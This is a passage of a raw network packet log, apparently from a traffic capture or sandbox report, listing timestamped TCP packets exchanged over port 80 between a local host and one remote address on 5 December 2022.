Dec 5, 2022 01:32:37.862063885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862076044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862077951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862097025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862112045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862114906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862128019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862135887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862150908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862154007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862164974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862175941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862190008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862198114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862204075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862217903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862221956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862237930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862241983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862257957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862267017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862277985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862288952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862298012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862308979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862318039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862332106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862337112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862349987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862358093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862361908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862371922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862376928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862396002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862397909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862415075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862416983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862431049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862436056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862453938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862454891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862473965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862473965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862488031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862493038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862512112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862514019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862530947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862540007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862550974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862550974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862570047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862571001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862590075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862590075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862602949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862610102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862627029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862627983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862648010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862648010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862667084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862673998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862685919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862685919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862706900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862706900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862720966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862725973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862745047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862746954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862760067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862765074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862782955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862783909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862802029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862803936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862814903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862822056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862839937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862842083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862859011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862865925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862880945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862886906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862903118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862906933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862926006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862932920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862946033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862948895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862966061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862968922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862982035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862986088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863006115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863007069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863023996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863032103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863044024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863044024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863063097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863066912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863084078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863085985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863104105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863105059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863123894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863126993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863142014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863142967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863163948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863169909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863183022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863183975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863202095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863208055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863220930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863221884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863240957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863245964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863260984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863261938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863282919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863285065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863301039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863303900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863315105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863321066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863339901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863339901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863353968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863358974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863374949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863377094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863396883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863396883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863409042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863418102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863435030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863435984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863456964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863460064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863473892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863482952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863500118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863501072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863518953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863522053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863539934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863540888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863553047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863560915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863579035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863579988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863598108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863599062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863616943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863619089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863637924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863640070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863653898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863658905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863677979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863677979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863692999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863698006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863715887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863717079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863735914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863738060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863751888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863754988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863774061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863775015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863792896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863795042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863814116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863816023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863832951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863836050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863852024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863856077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863871098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863877058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863889933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863889933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863908052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863912106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863925934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863928080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863948107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863948107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863967896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.863971949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863986969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.863986969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864007950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864008904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864027023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864031076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864047050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864051104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864064932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864067078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864088058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864089966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864104986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864108086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864126921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864128113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864146948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864150047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864165068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864166021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864186049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864187956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864202976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864206076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864221096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864224911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864240885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864244938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864262104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864264965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864279032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864284039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864304066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864304066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864319086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864322901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864340067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864342928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864362955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864362955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864377022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864382029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864402056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864402056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864413977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864420891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864437103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864442110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864460945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864463091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864483118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864483118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864495039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864502907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864521980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864521980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864538908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864541054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864561081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864562988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864576101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864581108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864599943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864599943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864619970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864619970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864633083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864639997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864659071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864664078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864675999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864679098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864697933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864703894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864716053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864718914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864736080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864739895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864756107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864759922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864779949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864780903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864794970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864799023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864816904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864818096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864837885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864845037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864856958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864856958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864890099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864890099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864903927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864908934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864927053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864933014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864944935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864953995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864964008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864970922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864980936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.864990950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.864999056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865010977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865016937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865027905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865035057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865041018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865053892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865070105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865078926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865078926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865087986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865097046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865107059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865123034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865123987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865134954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865140915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865145922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865159035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865169048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865175962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865181923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865195036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865196943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865211010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865220070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865227938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865232944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865246058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865253925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865263939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865264893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865281105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865302086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865314960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865315914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865334034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865350962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865359068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865370035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865386009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865387917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865406990 CET	80	49705	66.235.200.147	192.168.2.3
